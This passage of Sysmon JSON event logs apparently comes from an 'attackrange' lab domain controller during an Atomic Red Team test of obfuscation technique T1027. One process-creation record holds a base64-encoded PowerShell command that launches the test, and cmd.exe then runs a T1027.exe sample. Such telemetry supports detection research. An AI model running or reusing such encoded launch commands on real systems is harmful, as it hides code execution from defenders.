05:52:45.203","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010D8350A00}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5293,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.434\r\nProcessGuid: {A837DB8D-032D-5F25-0000-0010DB480A00}\r\nProcessId: 3808\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"\"%%temp%%\\temp_T1027.zip\\T1027.exe\"\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nParentProcessId: 3064\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.434","ProcessGuid":"{A837DB8D-032D-5F25-0000-0010DB480A00}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"\"%%temp%%\\temp_T1027.zip\\T1027.exe\"\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-032B-5F25-0000-0010D8E70900}","ParentProcessId":"3064","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5294,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.422\r\nSourceProcessGUID: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nSourceProcessId: 3064\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010DB480A00}\r\nTargetProcessId: 3808\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743cba8|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743ca1c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+474bf248|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47435604|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47eee5a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+473fddfc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4745c2cb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f7c1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47431746|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4746a8d6","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.422","SourceProcessGUID":"{A837DB8D-032B-5F25-0000-0010D8E70900}","SourceProcessId":"3064","SourceThreadId":"5088","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010DB480A00}","TargetProcessId":"3808","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743cba8|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743ca1c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+474bf248|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47435604|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47eee5a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+473fddfc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4745c2cb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f7c1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47431746|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4746a8d6","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5295,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.422\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010DB480A00}\r\nTargetProcessId: 3808\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.422","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010DB480A00}","TargetProcessId":"3808","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5296,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.422\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.422","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5297,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.422\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.422","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5298,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.422\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.422","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871",